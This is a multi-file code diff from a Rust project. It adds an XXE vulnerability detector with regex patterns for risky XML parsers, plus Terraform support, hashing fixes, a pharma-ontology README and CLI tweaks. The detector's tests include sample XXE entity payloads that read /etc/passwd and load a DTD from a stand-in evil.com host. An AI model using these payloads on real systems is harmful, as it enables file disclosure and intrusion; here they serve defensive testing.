go_xml: Regex::new(r#"xml\.(?:Unmarshal|NewDecoder)\s*\("#).expect("valid regex"),
|
||||
|
||||
// Java-style patterns (polyglot detection in config files, etc.)
|
||||
java_xxe: Regex::new(
|
||||
r#"(?:DocumentBuilder|SAXParser|XMLReader|TransformerFactory)(?:Factory)?\.new"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// DTD entity declaration (dangerous in untrusted XML)
|
||||
entity_decl: Regex::new(r#"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)"#)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
parser: &str,
|
||||
confidence: f32,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["xml", "parsing"],
|
||||
"parser_config",
|
||||
ObjectValue::Text(parser.to_string()),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
confidence,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for XxeExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"xxe"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for DTD entity declarations (high risk in any context)
|
||||
if let Some(m) = self.entity_decl.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"dtd_entity",
|
||||
0.95,
|
||||
"DTD SYSTEM/PUBLIC entity declaration (XXE attack vector)",
|
||||
));
|
||||
}
|
||||
|
||||
match language {
|
||||
Language::Python => {
|
||||
// lxml/etree (can be safe with proper configuration)
|
||||
if let Some(m) = self.python_lxml.find(line) {
|
||||
// Lower confidence if defusedxml is imported or resolve_entities=False
|
||||
let confidence = if content.contains("defusedxml")
|
||||
|| line.contains("resolve_entities=False")
|
||||
{
|
||||
0.5
|
||||
} else {
|
||||
0.85
|
||||
};
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"lxml",
|
||||
confidence,
|
||||
"lxml XML parsing may be vulnerable to XXE without proper config",
|
||||
));
|
||||
}
|
||||
|
||||
// xml.etree.ElementTree
|
||||
if let Some(m) = self.python_etree.find(line) {
|
||||
// Python 3.8+ has some protections, but external entities still a concern
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"elementtree",
|
||||
0.75,
|
||||
"xml.etree.ElementTree may allow external entity expansion",
|
||||
));
|
||||
}
|
||||
|
||||
// xml.dom.minidom (vulnerable by default)
|
||||
if let Some(m) = self.python_minidom.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"minidom",
|
||||
0.85,
|
||||
"xml.dom.minidom is vulnerable to XXE attacks",
|
||||
));
|
||||
}
|
||||
|
||||
// xml.sax (needs feature flags to be safe)
|
||||
if let Some(m) = self.python_sax.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"sax",
|
||||
0.85,
|
||||
"xml.sax is vulnerable to XXE without feature_external_ges=False",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::JavaScript | Language::TypeScript => {
|
||||
// xml2js (generally safer, but can be misconfigured)
|
||||
if let Some(m) = self.js_xml2js.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"xml2js",
|
||||
0.7,
|
||||
"xml2js XML parsing - verify external entity settings",
|
||||
));
|
||||
}
|
||||
|
||||
// libxmljs (can be vulnerable)
|
||||
if let Some(m) = self.js_libxmljs.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"libxmljs",
|
||||
0.85,
|
||||
"libxmljs may be vulnerable to XXE attacks",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Go => {
|
||||
// encoding/xml (safer by default, but DTD expansion can be issue)
|
||||
if let Some(m) = self.go_xml.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"encoding_xml",
|
||||
0.65,
|
||||
"Go xml package - generally safe but verify with untrusted input",
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
|
||||
// Check for Java patterns (polyglot detection)
|
||||
if let Some(m) = self.java_xxe.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"java_parser",
|
||||
0.9,
|
||||
"Java XML parser - requires feature flags to prevent XXE",
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_python_lxml() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
doc = etree.parse(xml_file)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("xml/parsing"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_lxml_with_defusedxml() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
import defusedxml.ElementTree as ET
|
||||
doc = etree.parse(xml_file)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
|
||||
|
||||
// Should still detect but with lower confidence
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].confidence < 0.6);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_elementtree() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
import xml.etree.ElementTree as ET
|
||||
tree = ET.parse(source)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "xml.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_minidom() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
from xml.dom.minidom import parse
|
||||
doc = xml.dom.minidom.parse(xml_string)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "parser.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("minidom"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_sax() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
xml.sax.parse(source, handler)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_xml2js() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
xml2js.parseString(xmlData, callback);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_libxmljs() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
const doc = libxmljs.parseXml(xmlString);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "parser.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_xml() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
err := xml.Unmarshal(data, &result)
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "parser.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_java_parser() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("Java"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_dtd_entity() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
||||
"#;
|
||||
|
||||
// Use a non-test filename to avoid confidence reduction
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "parser.xml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].confidence >= 0.9);
|
||||
assert!(claims[0].description.contains("XXE attack vector"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_dtd_public_entity() {
|
||||
let extractor = XxeExtractor::new();
|
||||
let content = r#"
|
||||
<!ENTITY % remote PUBLIC "http://evil.com/evil.dtd">
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "test.xml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
}
|
||||
@ -61,6 +61,7 @@ pub fn language_to_prefix(language: Language) -> &'static str {
|
||||
Language::GoMod => "gomod",
|
||||
Language::NpmManifest => "npm",
|
||||
Language::PythonManifest => "python",
|
||||
Language::Terraform => "terraform",
|
||||
Language::Unknown => "unknown",
|
||||
}
|
||||
}
|
||||
@ -84,6 +85,7 @@ pub fn language_to_name(language: Language) -> &'static str {
|
||||
Language::GoMod => "Go module",
|
||||
Language::NpmManifest => "NPM manifest",
|
||||
Language::PythonManifest => "Python manifest",
|
||||
Language::Terraform => "Terraform",
|
||||
Language::Unknown => "Unknown",
|
||||
}
|
||||
}
|
||||
@ -107,6 +109,7 @@ pub fn language_to_extension(language: Language) -> &'static str {
|
||||
Language::GoMod => "go",
|
||||
Language::NpmManifest => "json",
|
||||
Language::PythonManifest => "toml",
|
||||
Language::Terraform => "hcl",
|
||||
Language::Unknown => "",
|
||||
}
|
||||
}
|
||||
|
||||
@ -244,6 +244,7 @@ fn language_to_string(lang: Language) -> String {
|
||||
Language::GoMod => "gomod",
|
||||
Language::NpmManifest => "npm",
|
||||
Language::PythonManifest => "pip",
|
||||
Language::Terraform => "terraform",
|
||||
Language::Unknown => "unknown",
|
||||
}
|
||||
.to_string()
|
||||
|
||||
@ -34,6 +34,8 @@ pub enum Language {
|
||||
Dotenv,
|
||||
/// Docker files.
|
||||
Docker,
|
||||
/// Terraform files.
|
||||
Terraform,
|
||||
/// Cargo manifest.
|
||||
CargoManifest,
|
||||
/// Go module file.
|
||||
@ -62,6 +64,7 @@ impl fmt::Display for Language {
|
||||
Language::Ini => "ini",
|
||||
Language::Dotenv => "dotenv",
|
||||
Language::Docker => "docker",
|
||||
Language::Terraform => "terraform",
|
||||
Language::CargoManifest => "cargo",
|
||||
Language::GoMod => "gomod",
|
||||
Language::NpmManifest => "npm",
|
||||
@ -90,6 +93,7 @@ impl FromStr for Language {
|
||||
"ini" => Ok(Language::Ini),
|
||||
"dotenv" | "env" => Ok(Language::Dotenv),
|
||||
"docker" | "dockerfile" => Ok(Language::Docker),
|
||||
"terraform" | "tf" => Ok(Language::Terraform),
|
||||
"cargo" | "cargo.toml" => Ok(Language::CargoManifest),
|
||||
"gomod" | "go.mod" => Ok(Language::GoMod),
|
||||
"npm" | "package.json" => Ok(Language::NpmManifest),
|
||||
@ -153,6 +157,7 @@ impl Language {
|
||||
"toml" => Language::Toml,
|
||||
"json" => Language::Json,
|
||||
"ini" => Language::Ini,
|
||||
"tf" => Language::Terraform,
|
||||
_ => Language::Unknown,
|
||||
}
|
||||
}
|
||||
@ -174,6 +179,8 @@ mod tests {
|
||||
assert_eq!(Language::from_path(Path::new("go.mod")), Language::GoMod);
|
||||
assert_eq!(Language::from_path(Path::new(".env.production")), Language::Dotenv);
|
||||
assert_eq!(Language::from_path(Path::new("Dockerfile")), Language::Docker);
|
||||
assert_eq!(Language::from_path(Path::new("main.tf")), Language::Terraform);
|
||||
assert_eq!(Language::from_path(Path::new("variables.tf")), Language::Terraform);
|
||||
}
|
||||
|
||||
#[test]
|
||||
@ -201,6 +208,8 @@ mod tests {
|
||||
assert_eq!(Language::from_str("gomod").unwrap(), Language::GoMod);
|
||||
assert_eq!(Language::from_str("npm").unwrap(), Language::NpmManifest);
|
||||
assert_eq!(Language::from_str("pip").unwrap(), Language::PythonManifest);
|
||||
assert_eq!(Language::from_str("terraform").unwrap(), Language::Terraform);
|
||||
assert_eq!(Language::from_str("tf").unwrap(), Language::Terraform);
|
||||
}
|
||||
|
||||
#[test]
|
||||
|
||||
@ -24,7 +24,7 @@ pub use verdict::Verdict;
|
||||
/// # Example
|
||||
///
|
||||
/// ```
|
||||
/// use aphoria::types::PredicateAliasSet;
|
||||
/// use aphoria::PredicateAliasSet;
|
||||
///
|
||||
/// let aliases = PredicateAliasSet::new("enabled", vec!["required", "mandatory"]);
|
||||
/// assert!(aliases.contains("enabled"));
|
||||
|
||||
@ -37,7 +37,11 @@ impl PathMapper {
|
||||
Language::JavaScript | Language::NpmManifest => "javascript",
|
||||
Language::Cpp => "cpp",
|
||||
Language::Ini => "config",
|
||||
Language::Yaml | Language::Toml | Language::Json | Language::Dotenv => "config",
|
||||
Language::Yaml
|
||||
| Language::Toml
|
||||
| Language::Json
|
||||
| Language::Dotenv
|
||||
| Language::Terraform => "config",
|
||||
Language::Docker => "docker",
|
||||
Language::Unknown => "unknown",
|
||||
};
|
||||
|
||||
@ -60,7 +60,13 @@ pub fn compute_content_hash_v2(assertion: &Assertion) -> [u8; 32] {
|
||||
}
|
||||
ObjectValue::Number(n) => {
|
||||
hasher.update(b"N:");
|
||||
hasher.update(&n.to_le_bytes());
|
||||
// Round to 10 decimal places for reproducibility across JSON round-trips.
|
||||
// JSON serialization/deserialization can change the exact f64 bit pattern
|
||||
// for numbers that aren't exactly representable in decimal.
|
||||
// 10 decimal places is more than enough for real-world values while
|
||||
// surviving the decimal→binary→decimal conversion in JSON parsing.
|
||||
let s = format!("{:.10}", n);
|
||||
hasher.update(s.as_bytes());
|
||||
}
|
||||
ObjectValue::Boolean(b) => {
|
||||
hasher.update(b"B:");
|
||||
@ -79,8 +85,11 @@ pub fn compute_content_hash_v2(assertion: &Assertion) -> [u8; 32] {
|
||||
hasher.update(&(assertion.source_class as u8).to_le_bytes());
|
||||
|
||||
// Confidence and timestamp
|
||||
// Use string format for confidence (f32) to survive JSON round-trips.
|
||||
// f32 has ~7 significant decimal digits, so 6 decimal places is sufficient.
|
||||
hasher.update(b":");
|
||||
hasher.update(&assertion.confidence.to_le_bytes());
|
||||
let confidence_str = format!("{:.6}", assertion.confidence);
|
||||
hasher.update(confidence_str.as_bytes());
|
||||
hasher.update(b":");
|
||||
hasher.update(&assertion.timestamp.to_le_bytes());
|
||||
|
||||
|
||||
@ -1,7 +1,5 @@
|
||||
//! Record processing methods for the IngestWorker.
|
||||
//!
|
||||
//! Contains methods for ingesting assertions, votes, and epochs,
|
||||
//! including validation and signature verification.
|
||||
//! Record processing methods for the IngestWorker. Ingests assertions, votes,
|
||||
//! and epochs with validation and signature verification.
|
||||
|
||||
use super::record_types::RECORD_HEADER_SIZE;
|
||||
use super::{IngestWorker, RecordType};
|
||||
@ -327,12 +325,20 @@ impl<S: KVStore + 'static> IngestWorker<S> {
|
||||
// The hash covers: subject, predicate, object, source_hash, source_class, confidence, timestamp.
|
||||
let v2_content_hash: Option<[u8; 32]> =
|
||||
if assertion.signatures.iter().any(|s| s.version == 2) {
|
||||
// Debug: show exact number format for comparison with signing
|
||||
let object_str = match &assertion.object {
|
||||
stemedb_core::types::ObjectValue::Number(n) => format!("Number({:.17})", n),
|
||||
other => format!("{:?}", other),
|
||||
};
|
||||
let confidence_str = format!("{:.17}", assertion.confidence);
|
||||
let hash = compute_content_hash_v2(assertion);
|
||||
debug!(
|
||||
subject = %assertion.subject,
|
||||
predicate = %assertion.predicate,
|
||||
object = %object_str,
|
||||
source_hash = %hex::encode(assertion.source_hash),
|
||||
source_class = ?assertion.source_class,
|
||||
confidence = %assertion.confidence,
|
||||
confidence = %confidence_str,
|
||||
timestamp = %assertion.timestamp,
|
||||
content_hash = %hex::encode(hash),
|
||||
"Computed v2 content hash for verification"
|
||||
|
||||
177
crates/stemedb-ontology/README.md
Normal file
177
crates/stemedb-ontology/README.md
Normal file
@ -0,0 +1,177 @@
|
||||
# stemedb-ontology
|
||||
|
||||
Domain Ontology Layer for Episteme - defines how subjects are structured based on predicate type and domain. Ensures conflicts collide correctly when different sources report on the same thing.
|
||||
|
||||
## Module Overview
|
||||
|
||||
| Module | Purpose |
|
||||
|--------|---------|
|
||||
| `domain.rs` | Domain, EntityType, PredicateSchema, SourceTier builders |
|
||||
| `subject.rs` | SubjectBuilder for canonical subject construction |
|
||||
| `validator.rs` | Validates assertions against domain rules |
|
||||
| `client.rs` | HTTP client for StemeDB API |
|
||||
| `dto/` | Request/response DTOs for API communication |
|
||||
| `pharma/` | Pharmaceutical domain (reference implementation) |
|
||||
|
||||
## Quick Start
|
||||
|
||||
### CLI Usage (steme-pharma)
|
||||
|
||||
```bash
|
||||
# Build the CLI
|
||||
cargo build --release -p stemedb-ontology
|
||||
|
||||
# Ingest FDA label data
|
||||
./target/release/steme-pharma ingest semaglutide,tirzepatide
|
||||
|
||||
# Ingest with mock conflicts for testing
|
||||
./target/release/steme-pharma ingest semaglutide --with-conflicts
|
||||
|
||||
# Query conflicts (Skeptic lens - default)
|
||||
./target/release/steme-pharma query "Semaglutide:Type2Diabetes" hba1c_reduction_percent
|
||||
|
||||
# Query with source hierarchy (Layered Consensus)
|
||||
./target/release/steme-pharma query "Semaglutide:Type2Diabetes" weight_loss_percent --mode layered
|
||||
|
||||
# Compare two drugs
|
||||
./target/release/steme-pharma compare \
|
||||
"Semaglutide:Type2Diabetes" \
|
||||
"Tirzepatide:Type2Diabetes" \
|
||||
--predicate hba1c_reduction_percent
|
||||
|
||||
# Explore available predicates for a subject
|
||||
./target/release/steme-pharma explore "Semaglutide:Type2Diabetes"
|
||||
|
||||
# Validate a subject/predicate combination
|
||||
./target/release/steme-pharma validate "Semaglutide:Type2Diabetes" hba1c_reduction_percent
|
||||
|
||||
# JSON output (for scripting)
|
||||
./target/release/steme-pharma --format json query "Semaglutide" nausea_rate
|
||||
```
|
||||
|
||||
### Programmatic Usage
|
||||
|
||||
```rust
|
||||
use stemedb_ontology::{pharma, SubjectBuilder, Validator};
|
||||
use stemedb_ontology::client::StemeClient;
|
||||
use stemedb_ontology::pharma::extractors::{FdaLabelExtractor, MedicalExtractor, SourceInput};
|
||||
use ed25519_dalek::SigningKey;
|
||||
use rand::rngs::OsRng;
|
||||
|
||||
// Load the pharma domain definition
|
||||
let domain = pharma::definition();
|
||||
|
||||
// Build a subject using the ontology
|
||||
let schema = domain.get_schema("efficacy").unwrap();
|
||||
let mut entities = std::collections::HashMap::new();
|
||||
entities.insert("Drug".to_string(), "Semaglutide".to_string());
|
||||
entities.insert("Indication".to_string(), "Type2Diabetes".to_string());
|
||||
let subject = SubjectBuilder::build(schema, &entities, &domain).unwrap();
|
||||
assert_eq!(subject, "Semaglutide:Type2Diabetes");
|
||||
|
||||
// Validate assertions
|
||||
let validator = Validator::new(&domain);
|
||||
let result = validator.validate("hba1c_reduction_percent", &subject, 0.95);
|
||||
assert!(result.is_ok());
|
||||
|
||||
// Extract and ingest claims
|
||||
let client = StemeClient::new("http://localhost:18180");
|
||||
let extractor = FdaLabelExtractor::new();
|
||||
let signing_key = SigningKey::generate(&mut OsRng);
|
||||
let agent_id = signing_key.verifying_key().to_bytes();
|
||||
let hlc = uhlc::HLCBuilder::new().build();
|
||||
|
||||
let claims = extractor.extract(&SourceInput::DrugName("semaglutide".into())).await?;
|
||||
for claim in claims {
|
||||
let assertion = claim.to_assertion(&signing_key, agent_id, &hlc);
|
||||
let hash = client.assert(&assertion).await?;
|
||||
println!("Ingested: {}", hash);
|
||||
}
|
||||
|
||||
// Query for conflicts
|
||||
let skeptic = client.skeptic("Semaglutide:Type2Diabetes", "hba1c_reduction_percent").await?;
|
||||
println!("Conflict score: {}", skeptic.conflict_score);
|
||||
```
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────┐
|
||||
│ Domain Definition │
|
||||
│ (EntityTypes, Schemas, Hierarchy) │
|
||||
└──────────────┬──────────────────────┘
|
||||
│
|
||||
┌───────────────────────┼───────────────────────┐
|
||||
│ │ │
|
||||
v v v
|
||||
┌─────────────────┐ ┌──────────────────┐ ┌──────────────────┐
|
||||
│ SubjectBuilder │ │ Validator │ │ MedicalExtractor│
|
||||
│ │ │ │ │ (trait) │
|
||||
│ Build canonical │ │ Validate against │ │ Extract claims │
|
||||
│ subject strings │ │ domain rules │ │ from sources │
|
||||
└────────┬────────┘ └────────┬─────────┘ └────────┬─────────┘
|
||||
│ │ │
|
||||
└──────────────┬──────┴──────────────────────┘
|
||||
│
|
||||
v
|
||||
┌───────────────────┐
|
||||
│ StemeClient │
|
||||
│ │
|
||||
│ Submit assertions │
|
||||
│ Query with lenses │
|
||||
└─────────┬─────────┘
|
||||
│
|
||||
v
|
||||
┌───────────────────┐
|
||||
│ StemeDB API │
|
||||
│ :18180/v1/* │
|
||||
└───────────────────┘
|
||||
```
|
||||
|
||||
## Subject Patterns
|
||||
|
||||
Different predicate types use different subject structures to ensure proper collision:
|
||||
|
||||
| Category | Pattern | Example | Use Case |
|
||||
|----------|---------|---------|----------|
|
||||
| Efficacy | `{Drug}:{Indication}` | `Semaglutide:Type2Diabetes` | Outcome measures for specific conditions |
|
||||
| Safety | `{Drug}` | `Semaglutide` | Adverse events (apply across indications) |
|
||||
| Mechanism | `{Drug}:{Target}` | `Semaglutide:GLP1R` | Pharmacology details |
|
||||
| Comparison | `{Drug}:{Comparator}:{Indication}` | `Semaglutide:Tirzepatide:Type2Diabetes` | Head-to-head trials |
|
||||
|
||||
## Source Hierarchy
|
||||
|
||||
Claims are weighted by source authority:
|
||||
|
||||
| Tier | Source Class | Weight | Examples |
|
||||
|------|--------------|--------|----------|
|
||||
| 0 | Regulatory | 1.0 | FDA Labels, EMA Reports |
|
||||
| 1 | Clinical | 0.9 | Phase III RCTs, Lancet, NEJM |
|
||||
| 2 | Observational | 0.7 | Real-World Evidence, FAERS |
|
||||
| 3 | Expert | 0.5 | Guidelines, ADA Standards |
|
||||
| 4 | Community | 0.3 | PatientsLikeMe, Moderated Forums |
|
||||
| 5 | Anecdotal | 0.1 | Reddit, Twitter, Blog Posts |
|
||||
|
||||
## Adding a New Domain
|
||||
|
||||
See [Adding a Domain Guide](../../docs/guides/adding-a-domain.md) for step-by-step instructions on implementing new domains (e.g., cardiology, finance).
|
||||
|
||||
## Testing
|
||||
|
||||
```bash
|
||||
# Run all ontology tests
|
||||
cargo test -p stemedb-ontology
|
||||
|
||||
# Run with output
|
||||
cargo test -p stemedb-ontology -- --nocapture
|
||||
|
||||
# Consumer Health UAT
|
||||
cargo test -p stemedb-ontology --test consumer_health_uat
|
||||
```
|
||||
|
||||
## Related Documentation
|
||||
|
||||
- [What is Episteme](../../what-is-episteme.md)
|
||||
- [Architecture](../../architecture.md)
|
||||
- [Vision](../../vision.md)
|
||||
- [Consumer Health Use Case](../../docs/app-concepts/consumer-health.md)
|
||||
@ -40,21 +40,26 @@ pub async fn run_ingest(
|
||||
// Extract and ingest FDA claims
|
||||
if !args.mock_only {
|
||||
let extractor = FdaLabelExtractor::new();
|
||||
let drugs: Vec<&str> = args.drugs.split(',').map(str::trim).collect();
|
||||
let total_drugs = drugs.len();
|
||||
|
||||
for drug in args.drugs.split(',') {
|
||||
let drug = drug.trim();
|
||||
println!("--- Ingesting {} (FDA) ---", drug);
|
||||
for (drug_idx, drug) in drugs.iter().enumerate() {
|
||||
println!("--- [{}/{}] Ingesting {} (FDA) ---", drug_idx + 1, total_drugs, drug);
|
||||
|
||||
match extractor.extract(&SourceInput::DrugName(drug.to_string())).await {
|
||||
match extractor.extract(&SourceInput::DrugName((*drug).to_string())).await {
|
||||
Ok(claims) => {
|
||||
info!(drug = drug, claims_count = claims.len(), "Extracted FDA claims");
|
||||
for claim in claims {
|
||||
let claims_count = claims.len();
|
||||
info!(drug = drug, claims_count = claims_count, "Extracted FDA claims");
|
||||
|
||||
for (claim_idx, claim) in claims.iter().enumerate() {
|
||||
let assertion = claim.to_assertion(&signing_key, agent_id, &hlc);
|
||||
match client.assert(&assertion).await {
|
||||
Ok(hash) => {
|
||||
total_ingested += 1;
|
||||
println!(
|
||||
" [Regulatory] {} = {} -> {}...",
|
||||
" [{}/{}] [Regulatory] {} = {} -> {}...",
|
||||
claim_idx + 1,
|
||||
claims_count,
|
||||
claim.predicate,
|
||||
format_value(&claim.value),
|
||||
&hash[..16]
|
||||
@ -63,7 +68,13 @@ pub async fn run_ingest(
|
||||
Err(e) => {
|
||||
total_errors += 1;
|
||||
warn!(error = %e, predicate = %claim.predicate, "Failed to ingest");
|
||||
println!(" [ERROR] {} -> {}", claim.predicate, e);
|
||||
println!(
|
||||
" [{}/{}] [ERROR] {} -> {}",
|
||||
claim_idx + 1,
|
||||
claims_count,
|
||||
claim.predicate,
|
||||
e
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -105,7 +105,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.post(&url).json(&request).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
@ -170,7 +176,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.get(&url).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
@ -223,7 +235,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.get(&url).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
@ -286,7 +304,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.get(&url).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
@ -329,7 +353,13 @@ impl StemeClient {
|
||||
|
||||
let response = self.http_client.get(&url).send().await.map_err(|e| {
|
||||
if e.is_connect() {
|
||||
ClientError::ServerUnavailable { url: url.clone(), message: e.to_string() }
|
||||
ClientError::ServerUnavailable {
|
||||
url: url.clone(),
|
||||
message: format!(
|
||||
"Connection failed: {}. Ensure StemeDB is running: cargo run -p stemedb-api",
|
||||
e
|
||||
),
|
||||
}
|
||||
} else {
|
||||
ClientError::Http(e)
|
||||
}
|
||||
|
||||
@ -92,6 +92,12 @@ impl Journal {
|
||||
})?;
|
||||
guard.write(&buf)?;
|
||||
|
||||
// Update the cached segment size to reflect the write.
|
||||
// This ensures read() can use the cached size for bounds checking.
|
||||
let new_file_size =
|
||||
guard.file().metadata().map_err(|e| QuarantineError::io(guard.path(), e))?.len();
|
||||
self.segment_mgr.update_current_segment_size(new_file_size);
|
||||
|
||||
let offset = self.current_offset;
|
||||
self.current_offset += record.disk_size();
|
||||
|
||||
|
||||
@ -147,6 +147,17 @@ impl SegmentManager {
|
||||
current_segment_size >= self.max_segment_size
|
||||
}
|
||||
|
||||
/// Update the cached size of the current (latest) segment.
|
||||
///
|
||||
/// Call this after appending data to keep the cached size in sync with
|
